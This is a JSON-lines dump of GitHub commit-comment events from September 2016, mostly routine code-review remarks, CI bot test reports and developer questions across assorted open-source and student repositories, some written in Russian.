{"id":"4566112851","type":"CommitCommentEvent","actor":{"login":"seanf"},"repo":{"name":"zanata/zanata-server"},"payload":{"comment":{"id":19030552,"position":14,"line":2189,"path":"pom.xml","commit_id":"5911942e2f9e9566264debadabde5daf467929a9","created_at":"2016-09-15T04:59:26Z","updated_at":"2016-09-15T04:59:26Z","body":"We have another option `-DskipFuncTests` which is meant for this."}},"created_at":"2016-09-15T04:59:26Z"}
{"id":"4566114874","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030557,"position":124,"line":13,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:00:20Z","updated_at":"2016-09-15T05:00:20Z","body":"здесь нужно исправить на ul и li "}},"created_at":"2016-09-15T05:00:20Z"}
{"id":"4566114938","type":"CommitCommentEvent","actor":{"login":"seanf"},"repo":{"name":"zanata/zanata-server"},"payload":{"comment":{"id":19030558,"position":5,"line":41,"path":"etc/scripts/quickbuild.sh","commit_id":"5911942e2f9e9566264debadabde5daf467929a9","created_at":"2016-09-15T05:00:21Z","updated_at":"2016-09-15T05:00:21Z","body":"Watch out for committing unwanted changes. We should change this script so that you can add extra arguments to the command line, instead of having to hack on the file."}},"created_at":"2016-09-15T05:00:21Z"}
{"id":"4566121833","type":"CommitCommentEvent","actor":{"login":"javierluraschi"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":19030577,"position":null,"line":null,"path":null,"commit_id":"4efab1d338efca02fe68f1855909006909cad785","created_at":"2016-09-15T05:03:28Z","updated_at":"2016-09-15T05:03:28Z","body":"@jmcphers looks great, thanks for taking care of this!"}},"created_at":"2016-09-15T05:03:28Z"}
{"id":"4566123691","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030579,"position":123,"line":12,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:04:22Z","updated_at":"2016-09-15T05:04:22Z","body":"nav это для главной навигации, а здесь у нас просто информационная панель, тут нужен просто div,  "}},"created_at":"2016-09-15T05:04:22Z"}
{"id":"4566126749","type":"CommitCommentEvent","actor":{"login":"spzSource"},"repo":{"name":"drafteee/Unit-Tests-C--lab1-SPP-"},"payload":{"comment":{"id":19030591,"position":27,"line":30,"path":"QuickSortNS/UnitTestQuickSort/UnitTest.cs","commit_id":"994324504e187bdca4d329c3babf3f50030888d1","created_at":"2016-09-15T05:05:45Z","updated_at":"2016-09-15T05:05:45Z","body":"Please, use CollectionAssert instead of a strings comparison."}},"created_at":"2016-09-15T05:05:45Z"}
{"id":"4566129565","type":"CommitCommentEvent","actor":{"login":"Kalvin126"},"repo":{"name":"kfix/ddcctl"},"payload":{"comment":{"id":19030598,"position":null,"line":null,"path":null,"commit_id":"4551862b83b086ee50144e035c3943563010f377","created_at":"2016-09-15T05:06:43Z","updated_at":"2016-09-15T05:06:43Z","body":"woooooooooow 👍 Very nice. I feel obliged to remake BrightnessMenulet from the ground up in Swift now. I can confirm it works for my setup."}},"created_at":"2016-09-15T05:06:43Z"}
{"id":"4566130908","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030606,"position":126,"line":15,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:07:24Z","updated_at":"2016-09-15T05:07:24Z","body":"вообще на реальном проекте этот элемент нужно сделать бы формой, так как туда вводится какая то информация и отправляется запрос"}},"created_at":"2016-09-15T05:07:24Z"}
{"id":"4566131733","type":"CommitCommentEvent","actor":{"login":"thiago"},"repo":{"name":"thiago/drone"},"payload":{"comment":{"id":19030611,"position":34,"line":164,"path":"store/datastore/repos_test.go","commit_id":"239c36434279d6241555e9f8079405f950a39fc4","created_at":"2016-09-15T05:07:47Z","updated_at":"2016-09-15T05:07:47Z","body":"I have not found another way to test, since the limit is not configurable."}},"created_at":"2016-09-15T05:07:47Z"}
{"id":"4566132535","type":"CommitCommentEvent","actor":{"login":"quigonjohnn"},"repo":{"name":"jfoenixadmin/JFoenix"},"payload":{"comment":{"id":19030613,"position":null,"line":null,"path":null,"commit_id":"f071891eae7b9188ec0d99b29e38f36eaa66f8ce","created_at":"2016-09-15T05:08:09Z","updated_at":"2016-09-15T05:08:09Z","body":"I've been wondering why you changed the design of the check boxes. The old animation was the perfect pop that I was looking for, while the new design looks a bit heavy for the screen I'm using them on. Is there a specific reason they have been reworked? Also, is there a way I can to specify which skin to use?"}},"created_at":"2016-09-15T05:08:09Z"}
{"id":"4566133253","type":"CommitCommentEvent","actor":{"login":"spzSource"},"repo":{"name":"drafteee/Unit-Tests-C--lab1-SPP-"},"payload":{"comment":{"id":19030615,"position":10,"line":10,"path":"QuickSortNS/QuickSortNS/CompareObj.cs","commit_id":"98e9ca45fdba9a508b7aa46eb171d9f598d1f58b","created_at":"2016-09-15T05:08:27Z","updated_at":"2016-09-15T05:08:27Z","body":"The better way to use generic IComparer<T> implementation. It will be more type safe way."}},"created_at":"2016-09-15T05:08:27Z"}
{"id":"4566133381","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030616,"position":132,"line":21,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:08:31Z","updated_at":"2016-09-15T05:08:31Z","body":"Это кнопка, ее не нужно оборачивать в div, это лишняя вложенность."}},"created_at":"2016-09-15T05:08:31Z"}
{"id":"4566135546","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030618,"position":130,"line":19,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:09:31Z","updated_at":"2016-09-15T05:09:31Z","body":"Здесь внутри div нужно разметить еще и цифру "}},"created_at":"2016-09-15T05:09:31Z"}
{"id":"4566135726","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030619,"position":128,"line":17,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:09:37Z","updated_at":"2016-09-15T05:09:37Z","body":"Здесь внутри div нужно разметить еще и цифру "}},"created_at":"2016-09-15T05:09:37Z"}
{"id":"4566137719","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030627,"position":288,"line":43,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:10:32Z","updated_at":"2016-09-15T05:10:32Z","body":"А вот здесь как раз нужен nav"}},"created_at":"2016-09-15T05:10:32Z"}
{"id":"4566141662","type":"CommitCommentEvent","actor":{"login":"spzSource"},"repo":{"name":"drafteee/Unit-Tests-C--lab1-SPP-"},"payload":{"comment":{"id":19030637,"position":null,"line":null,"path":null,"commit_id":"53a857d8642d9618d41010782ea48634840f29cb","created_at":"2016-09-15T05:12:18Z","updated_at":"2016-09-15T05:12:18Z","body":"Please, add following lines into your gitignore file:\r\nhttps://github.com/github/gitignore/blob/master/VisualStudio.gitignore"}},"created_at":"2016-09-15T05:12:18Z"}
{"id":"4566144996","type":"CommitCommentEvent","actor":{"login":"lfarah"},"repo":{"name":"mixpanel/mixpanel-swift"},"payload":{"comment":{"id":19030646,"position":null,"line":null,"path":null,"commit_id":"d7e59bf251ae18fa794451321eead12741feb4ab","created_at":"2016-09-15T05:13:50Z","updated_at":"2016-09-15T05:13:50Z","body":"@yarneo please update CocoaPods"}},"created_at":"2016-09-15T05:13:50Z"}
{"id":"4566144998","type":"CommitCommentEvent","actor":{"login":"laggingreflex"},"repo":{"name":"tjunnone/npm-check-updates"},"payload":{"comment":{"id":19030647,"position":20,"line":57,"path":"package.json","commit_id":"ea2e4009749acfc12372f99210fc55ab43e96cc3","created_at":"2016-09-15T05:13:50Z","updated_at":"2016-09-15T05:13:50Z","body":"This is why it's breaking: http://stackoverflow.com/questions/39503069/what-has-changed-in-lodash-from-3-to-4-that-this-code-is-not-working\r\n\r\nLodash has changed `._pick` method slightly. There's a simple fix for this particular case, just change it to `_.pickBy`. But there could be other breaking stuff in Lodash 4. "}},"created_at":"2016-09-15T05:13:50Z"}
{"id":"4566148494","type":"CommitCommentEvent","actor":{"login":"tobi-m"},"repo":{"name":"asciidocfx/AsciidocFX"},"payload":{"comment":{"id":19030659,"position":null,"line":null,"path":null,"commit_id":"e6d574d9817bcaf9500377b93675dfa5903cfaf4","created_at":"2016-09-15T05:15:28Z","updated_at":"2016-09-15T05:15:28Z","body":"Somehow the files with the lowercase filename still exist in the folder. This results in an overwrite message when the zip gets extracted on a Windows system.\r\n\r\n![asciidocfx-swedish](https://cloud.githubusercontent.com/assets/6864605/18539016/0b76b326-7b14-11e6-882f-6919bbd5bb09.PNG)\r\n"}},"created_at":"2016-09-15T05:15:28Z"}
{"id":"4566150737","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19030666,"position":17,"line":2242,"path":"data/scripts.js","commit_id":"63a457ff504653c2c4b52ed55425a5381d133d44","created_at":"2016-09-15T05:16:25Z","updated_at":"2016-09-15T05:16:25Z","body":"IMO this belongs to ``randomSet`` / ``randomDoublesSet``.\r\nProbably return ``null``, and retry in ``randomTeam`` for this case?"}},"created_at":"2016-09-15T05:16:25Z"}
{"id":"4566151094","type":"CommitCommentEvent","actor":{"login":"willpatera"},"repo":{"name":"nathakits/pupil-labs-website"},"payload":{"comment":{"id":19030669,"position":5,"line":49,"path":"templates/includes/head.jade","commit_id":"890aa98c75c3349b5296666eecee67707aefca63","created_at":"2016-09-15T05:16:35Z","updated_at":"2016-09-15T05:16:35Z","body":"@nathakits - this hash number needs to be updated by the gulp script every time the site is built. Renaming the file is the first step, but all references to the file with its new name must also be updated programmatically (not manually)."}},"created_at":"2016-09-15T05:16:35Z"}
{"id":"4566151583","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/Spartanizer"},"payload":{"comment":{"id":19030671,"position":null,"line":null,"path":null,"commit_id":"833edeab9aa38a4fdc2a327cab60d1b3f1e80e5d","created_at":"2016-09-15T05:16:48Z","updated_at":"2016-09-15T05:16:48Z","body":"Very good point! Do we have test cases for modifiers on annotations?"}},"created_at":"2016-09-15T05:16:48Z"}
{"id":"4566153157","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19030674,"position":null,"line":null,"path":null,"commit_id":"0997ad0eec80c2609a372526bdfc30604541ec0c","created_at":"2016-09-15T05:17:30Z","updated_at":"2016-09-15T05:17:30Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - Win64-Windows-7-VisualStudio-12: OK (2335 of 2336 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0997ad0eec80c2609a372526bdfc30604541ec0c-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0997ad0eec80c2609a372526bdfc30604541ec0c-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T05:17:30Z"}
{"id":"4566153719","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"jarun/googler"},"payload":{"comment":{"id":19030675,"position":null,"line":null,"path":null,"commit_id":"6f31117c4e081ae00f40302d9d973e5de64fb3bd","created_at":"2016-09-15T05:17:45Z","updated_at":"2016-09-15T05:17:45Z","body":"I wonder why this even is in the README. First, I don't know what rofi is (seems it got ~1000 stars on GitHub, but that's just \"fairly popular\" by GitHub standards). Secondly, the script looks trivial, I bet most rofi users can put it together easily. Thirdly, it's \"written by an anonymous user, untested and we don't maintain it\", so why should we recommend it in our *official* documentation? Lastly, now it's in such a prominent place, it's above all of our official installation channels... Not sure I follow the thinking here."}},"created_at":"2016-09-15T05:17:45Z"}
{"id":"4566154735","type":"CommitCommentEvent","actor":{"login":"willpatera"},"repo":{"name":"nathakits/pupil-labs-website"},"payload":{"comment":{"id":19030676,"position":19,"line":46,"path":"gulpfile.coffee","commit_id":"75ff389795f871a111b416351f1425e2e6e96378","created_at":"2016-09-15T05:18:13Z","updated_at":"2016-09-15T05:18:13Z","body":"Wouldn't it make more sense to swap the order here. First add revision number then gzip the file?"}},"created_at":"2016-09-15T05:18:13Z"}
{"id":"4566156862","type":"CommitCommentEvent","actor":{"login":"willpatera"},"repo":{"name":"nathakits/pupil-labs-website"},"payload":{"comment":{"id":19030679,"position":5,"line":49,"path":"templates/includes/head.jade","commit_id":"75ff389795f871a111b416351f1425e2e6e96378","created_at":"2016-09-15T05:19:11Z","updated_at":"2016-09-15T05:19:11Z","body":"@nathakits - see my comment on `gulp_rev_test` - this reference to the file needs to be updated programmatically. "}},"created_at":"2016-09-15T05:19:11Z"}
{"id":"4566159025","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19030681,"position":null,"line":null,"path":null,"commit_id":"4f4187320ae65c51336356d00f806e796bd8ae32","created_at":"2016-09-15T05:20:14Z","updated_at":"2016-09-15T05:20:14Z","body":"Initial commit."}},"created_at":"2016-09-15T05:20:14Z"}
{"id":"4566161259","type":"CommitCommentEvent","actor":{"login":"Tigery890"},"repo":{"name":"Tigery890/Ty"},"payload":{"comment":{"id":19030687,"position":null,"line":null,"path":null,"commit_id":"183d88380d3206a6e0a4c5a4e7ae01840bfb6e7b","created_at":"2016-09-15T05:21:13Z","updated_at":"2016-09-15T05:21:13Z","body":"success"}},"created_at":"2016-09-15T05:21:13Z"}
{"id":"4566164486","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"jarun/googler"},"payload":{"comment":{"id":19030688,"position":null,"line":null,"path":null,"commit_id":"6f31117c4e081ae00f40302d9d973e5de64fb3bd","created_at":"2016-09-15T05:22:43Z","updated_at":"2016-09-15T05:22:43Z","body":"And I highly doubt more than 5% (I could say 1%) of googler users will be using googler in this rofi thing. If rofi deserves a mention, and such a prominent mention for that matter, I would also nominate Alfred, Dropzone, etc. that you might have never heard about."}},"created_at":"2016-09-15T05:22:43Z"}
{"id":"4566164656","type":"CommitCommentEvent","actor":{"login":"jwhui"},"repo":{"name":"openthread/openthread"},"payload":{"comment":{"id":19030689,"position":5,"line":93,"path":"tests/scripts/ncp/test_ncp_mac.py","commit_id":"00231d4a014fc51729a052e27c5f3ed6bb1378d6","created_at":"2016-09-15T05:22:48Z","updated_at":"2016-09-15T05:22:48Z","body":"It's clear to me that the only goal of these tests are to get lines of code in codecov reported as green.  I personally find that this has very little value and is the primary reason why code coverage as a metric is often criticized."}},"created_at":"2016-09-15T05:22:48Z"}
{"id":"4566167209","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19030693,"position":null,"line":null,"path":null,"commit_id":"f91224b967a97c2de0d5d064b53bad62f866402c","created_at":"2016-09-15T05:23:58Z","updated_at":"2016-09-15T05:23:58Z","body":"Initial commit"}},"created_at":"2016-09-15T05:23:58Z"}
{"id":"4566167392","type":"CommitCommentEvent","actor":{"login":"willshen"},"repo":{"name":"TheUpshot/prison-admissions"},"payload":{"comment":{"id":19030696,"position":null,"line":null,"path":null,"commit_id":"f95448240dafa279d2805c24d03ffa8554ba07c1","created_at":"2016-09-15T05:24:02Z","updated_at":"2016-09-15T05:24:02Z","body":"@1wheel: Adam, what was the reason for the change of data here? Does that mean the charts (breakdown of admission by county sizes over year) on the news page also need to be updated?\r\n"}},"created_at":"2016-09-15T05:24:02Z"}
{"id":"4566168945","type":"CommitCommentEvent","actor":{"login":"vitalidze"},"repo":{"name":"vitalidze/traccar-web"},"payload":{"comment":{"id":19030701,"position":null,"line":null,"path":null,"commit_id":"7a5196abd5c29fa3f4ad761a58c2c4e7d625507f","created_at":"2016-09-15T05:24:44Z","updated_at":"2016-09-15T05:24:44Z","body":"> Can you indicate me the right Branch please?. I being trying for days to apply this solution but i always get some error (Net Bean, eclipse, decompilers, MAven, Javac, etc..) I almost give up. Thank you.\r\n\r\nAs I said in my previous comment you should use `dev` branch.\r\n\r\n> Edit: The issue #822 occurs just in some cases? I reinstall my VPS server, traccar software and Web UI but the problem persist. I jus get a Blank Page after login, and works if you reload. Sorry, so many questions..\r\n\r\nYes, it occurs only in some cases. However, I cannot tell why there are no such issue on the demo server. Another approach to fix the issue is to have a working API key from google. Then you can update your `traccar.html` file inside `traccar-web.war` file without recompilation."}},"created_at":"2016-09-15T05:24:44Z"}
{"id":"4566169971","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19030703,"position":null,"line":null,"path":null,"commit_id":"5a365e54deb644b86a634dbb422c67c25bcc6393","created_at":"2016-09-15T05:25:12Z","updated_at":"2016-09-15T05:25:12Z","body":"versionNumbers (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1189 of 1189 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5a365e54deb644b86a634dbb422c67c25bcc6393-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5a365e54deb644b86a634dbb422c67c25bcc6393-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5a365e54deb644b86a634dbb422c67c25bcc6393-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-15T05:25:12Z"}
{"id":"4566170181","type":"CommitCommentEvent","actor":{"login":"Tigery890"},"repo":{"name":"Tigery890/Ty"},"payload":{"comment":{"id":19030704,"position":null,"line":null,"path":null,"commit_id":"183d88380d3206a6e0a4c5a4e7ae01840bfb6e7b","created_at":"2016-09-15T05:25:16Z","updated_at":"2016-09-15T05:25:16Z","body":"success"}},"created_at":"2016-09-15T05:25:16Z"}
{"id":"4566172271","type":"CommitCommentEvent","actor":{"login":"MarkehMe"},"repo":{"name":"lucko/FactionsFramework"},"payload":{"comment":{"id":19030709,"position":null,"line":null,"path":null,"commit_id":"d5411c5d593190832233cf3367919742e285b675","created_at":"2016-09-15T05:26:11Z","updated_at":"2016-09-15T05:26:11Z","body":"Just do you know - the idea of FactionsFramework is not to use shading, and that server owners can update to newer versions without being dependant on plugin developers updating 😃 \r\n\r\nRead more here: https://github.com/MarkehMe/FactionsFramework/wiki/Setting-up-development-environment#shading-shadowing-fatjar-etc"}},"created_at":"2016-09-15T05:26:11Z"}
{"id":"4566172612","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030710,"position":121,"line":10,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:26:19Z","updated_at":"2016-09-15T05:26:19Z","body":"Немного не верная структура получилась - http://joxi.ru/E2pzG9bFBR7qwr . Как сделать правильно - во первых поменять местами блоки как на картинке, во-вторых, либо main-header закрыть перед main-menu, тогда будет два отдельных блока, но логичнее конечно внутри хедера сделать несколько блоков внутри которых будут центрующие контейнеры. И выглядеть должно так:  http://joxi.ru/nAynWM9SXpgqgr"}},"created_at":"2016-09-15T05:26:19Z"}
{"id":"4566176754","type":"CommitCommentEvent","actor":{"login":"achubutkin"},"repo":{"name":"achubutkin/inparametrics"},"payload":{"comment":{"id":19030720,"position":1,"line":1,"path":"App_Code/IgClient.cs","commit_id":"44c69f8d40c2e9028491e1182acb047ed8e22134","created_at":"2016-09-15T05:28:08Z","updated_at":"2016-09-15T05:28:08Z","body":"Не стоит так много редактировать! Лучше заменить файл целиком, иначе сложно отследить изменения."}},"created_at":"2016-09-15T05:28:08Z"}
{"id":"4566178168","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-github"},"payload":{"comment":{"id":19030730,"position":null,"line":null,"path":null,"commit_id":"ce7d8f96fae5cec2d056d97cce83734c480f5021","created_at":"2016-09-15T05:28:42Z","updated_at":"2016-09-15T05:28:42Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#bodE0wZJT_ea8l0vqNtaAQ"}},"created_at":"2016-09-15T05:28:42Z"}
{"id":"4566178431","type":"CommitCommentEvent","actor":{"login":"gadget2k"},"repo":{"name":"CodyHouse/horizontal-timeline"},"payload":{"comment":{"id":19030731,"position":null,"line":null,"path":null,"commit_id":"71b038c7277dd9299ce0e6bad484a6ccfbf4254b","created_at":"2016-09-15T05:28:49Z","updated_at":"2016-09-15T05:28:49Z","body":"I'm an amateur, some simple question: I can't show contents in <ul><li> structure. Only simple text can be shown. Is there any fix to this? Your reply is highly appreciated."}},"created_at":"2016-09-15T05:28:49Z"}
{"id":"4566180583","type":"CommitCommentEvent","actor":{"login":"Tigery890"},"repo":{"name":"Tigery890/Ty"},"payload":{"comment":{"id":19030735,"position":3,"line":1,"path":"README.md","commit_id":"183d88380d3206a6e0a4c5a4e7ae01840bfb6e7b","created_at":"2016-09-15T05:29:44Z","updated_at":"2016-09-15T05:29:44Z","body":"success"}},"created_at":"2016-09-15T05:29:44Z"}
{"id":"4566187831","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030766,"position":325,"line":75,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:32:42Z","updated_at":"2016-09-15T05:32:42Z","body":"на  этом проекте не получится выделить один wrapper на все блоки, так как в седоне у вас просто ровнялось все по центру, а в техномарте у вас есть блоки, которые тянутся на всю ширину (там где фоновый цвет есть). Как исправить - задать внутри каждой секции центрирующий блок "}},"created_at":"2016-09-15T05:32:42Z"}
{"id":"4566189657","type":"CommitCommentEvent","actor":{"login":"jarun"},"repo":{"name":"jarun/googler"},"payload":{"comment":{"id":19030770,"position":null,"line":null,"path":null,"commit_id":"6f31117c4e081ae00f40302d9d973e5de64fb3bd","created_at":"2016-09-15T05:33:29Z","updated_at":"2016-09-15T05:33:29Z","body":"Yes, I think I should pull it back where it was, given it's unmaintained."}},"created_at":"2016-09-15T05:33:29Z"}
{"id":"4566190428","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"jarun/googler"},"payload":{"comment":{"id":19030773,"position":null,"line":null,"path":null,"commit_id":"6f31117c4e081ae00f40302d9d973e5de64fb3bd","created_at":"2016-09-15T05:33:49Z","updated_at":"2016-09-15T05:33:49Z","body":"👍 "}},"created_at":"2016-09-15T05:33:49Z"}
{"id":"4566195022","type":"CommitCommentEvent","actor":{"login":"xthedeus"},"repo":{"name":"AnalogIO/Analog-Tamigo-API"},"payload":{"comment":{"id":19030782,"position":null,"line":null,"path":null,"commit_id":"1b97363a0f1e7429118f0bb1ff662d5c6b819cf8","created_at":"2016-09-15T05:35:43Z","updated_at":"2016-09-15T05:35:43Z","body":"Yes, but since we are the only one using it, I took it intern and requested update before I deployed.\r\nI would argue that this is the format to return json.\r\n\r\nI'm still not sure about the format of the timestamps."}},"created_at":"2016-09-15T05:35:43Z"}
{"id":"4566196920","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030784,"position":328,"line":78,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:36:32Z","updated_at":"2016-09-15T05:36:32Z","body":"Лишняя вложенность, для иконки домика можно просто задать какой то уникальный класс для ссылки, без добавления span"}},"created_at":"2016-09-15T05:36:32Z"}
{"id":"4566198060","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030787,"position":326,"line":76,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:37:03Z","updated_at":"2016-09-15T05:37:03Z","body":"сюда внутрь добавить центрирующий блок"}},"created_at":"2016-09-15T05:37:03Z"}
{"id":"4566198941","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030789,"position":339,"line":89,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:37:26Z","updated_at":"2016-09-15T05:37:26Z","body":"сюда внутрь добавить центрирующий блок"}},"created_at":"2016-09-15T05:37:26Z"}
{"id":"4566200601","type":"CommitCommentEvent","actor":{"login":"csbao"},"repo":{"name":"itstiffchen/itstiffchen.github.io"},"payload":{"comment":{"id":19030796,"position":null,"line":null,"path":null,"commit_id":"22dde105321f3fc58cb8d64dfbf77ff42d6ffcb7","created_at":"2016-09-15T05:38:11Z","updated_at":"2016-09-15T05:38:11Z","body":"hi"}},"created_at":"2016-09-15T05:38:11Z"}
{"id":"4566203738","type":"CommitCommentEvent","actor":{"login":"itcentrecourses"},"repo":{"name":"itcentrecourses/RepositoryBase004"},"payload":{"comment":{"id":19030801,"position":null,"line":null,"path":null,"commit_id":"e119ba3ee933db15842098e1f88d6cf2974fff48","created_at":"2016-09-15T05:39:32Z","updated_at":"2016-09-15T05:39:32Z","body":"Доброе утро! Прекратить выполнение работы метода возможно с помощью ключевого слова return. Либо если ты хочешь прекратить выполнение программы в целом, достаточно вызвать System.exit(0)."}},"created_at":"2016-09-15T05:39:32Z"}
{"id":"4566205031","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030802,"position":341,"line":91,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:40:06Z","updated_at":"2016-09-15T05:40:06Z","body":"Здесь необходимо добавить родительский div, как бы вы не решили делать сетку, на float или inline-block - обертка вам понадобится."}},"created_at":"2016-09-15T05:40:06Z"}
{"id":"4566208444","type":"CommitCommentEvent","actor":{"login":"czlee"},"repo":{"name":"czlee/tabbycat"},"payload":{"comment":{"id":19030810,"position":null,"line":null,"path":null,"commit_id":"1f6180781038f9209ef81fe2c10f2fabd83bdca7","created_at":"2016-09-15T05:41:34Z","updated_at":"2016-09-15T05:41:34Z","body":"oh whoops just kidding, this:\r\nhttps://code.djangoproject.com/ticket/4136\r\nthis is weird now though, since it contradicts documentation"}},"created_at":"2016-09-15T05:41:34Z"}
{"id":"4566208585","type":"CommitCommentEvent","actor":{"login":"erikboto"},"repo":{"name":"Pelagicore/genivi-dev-platform"},"payload":{"comment":{"id":19030811,"position":4,"line":7,"path":"gdp-src-build/conf/templates/minnowboard.bblayers.conf","commit_id":"87240e5800a01a0bcf3190faa11658524e6aa92f","created_at":"2016-09-15T05:41:39Z","updated_at":"2016-09-15T05:41:39Z","body":"Yeah I know, but it's a good thing you poke me about it otherwise I'd probably just forget cleaning it up a bit. Thanks! (this goes for the other comments as well)"}},"created_at":"2016-09-15T05:41:39Z"}
{"id":"4566212330","type":"CommitCommentEvent","actor":{"login":"essepuntato"},"repo":{"name":"perma-id/w3id.org"},"payload":{"comment":{"id":19030819,"position":null,"line":null,"path":null,"commit_id":"3123825d876f9d0ae75e3d2fd8182f5091a58dc9","created_at":"2016-09-15T05:43:20Z","updated_at":"2016-09-15T05:43:20Z","body":"Hi @dgarijo,\r\n\r\nI actually don't get this deletion. Is there any problem?\r\n\r\nHave a nice day :-)\r\n\r\nS."}},"created_at":"2016-09-15T05:43:20Z"}
{"id":"4566213535","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030822,"position":365,"line":115,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:43:51Z","updated_at":"2016-09-15T05:43:51Z","body":"http://shpargalkablog.ru/2013/08/checked.html - почитайте здесь про инпуты - обратите внимание на атрибут name и найдите ошибку)"}},"created_at":"2016-09-15T05:43:51Z"}
{"id":"4566214273","type":"CommitCommentEvent","actor":{"login":"SalmonGER"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19030823,"position":null,"line":null,"path":null,"commit_id":"c1070935819eaeaafce99c6cdf1340b6fc090417","created_at":"2016-09-15T05:44:11Z","updated_at":"2016-09-15T05:44:11Z","body":"Magic of Git I guess"}},"created_at":"2016-09-15T05:44:11Z"}
